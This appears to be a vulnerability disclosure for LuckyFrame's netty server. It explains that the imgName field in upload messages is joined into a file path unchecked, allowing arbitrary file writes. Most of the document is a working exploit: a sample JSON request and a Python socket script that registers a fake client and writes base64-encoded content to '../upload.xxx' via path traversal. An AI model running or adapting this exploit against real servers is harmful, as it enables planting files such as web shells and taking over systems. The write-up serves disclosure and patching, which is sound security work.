The server uses netty to start the server, and then processes messages in ServerHandler#channelRead
Use fastjson to parse json data, and distinguish different request methods through CLIENT_METHOD("method") in the data
com.luckyframe.common.netty.ServerHandler#channelRead
When processing the upload request method, the IMG_NAME("imgName") in the data body was directly obtained for splicing, resulting in an arbitrary file writing vulnerability
com.luckyframe.common.netty.ServerHandler#channelRead
The important fields are that imgName is the destination filename on the server
The content of the file is controlled by fileUploadFile where bytes is the encoded data of base64, starPos, endPos are the start position and end position respectively
{
"imgName":"file",
"method":"upload",
"data":{
"code":1,
"fileUploadFile":{
"bytes":"YWJjZGVmZ2hpag==",
"endPos":10,
"file":"",
"starPos":0
},
"message":"test",
"uniId":"2131231"
},
"start":0,
"uuid":"1231231"
}
Scripting with Python
import socket
import base64
dst_filename = "../upload.xxx"
file_content = "Upload Success!!!!"
b64_file_content = base64.b64encode(file_content.encode()).decode()
content_length = len(file_content)
upload_data = str({
"imgName": dst_filename,
"method": "upload",
"data": {
"code": 1,
"fileUploadFile": {
"bytes": b64_file_content,
"endPos": content_length,
"file": "",
"starPos": 0
},
"message": "test",
"uniId": "2131231"
},
"start": 0,
"uuid": "1231231"
})
register_client_data = str({
"hostName": "172.22.96.22", "method": "clientUp",
"clientName": "", "ip": "172.22.96.22", "version": "3.5"
})
client = socket.socket()
client.connect(("192.168.157.1", 7070))
client.send(f'{register_client_data}$_'.encode())
print(client.recv(4096))
client.send(f"{upload_data}$_".encode())
print(client.recv(65535))
client.close()
uploaded successfully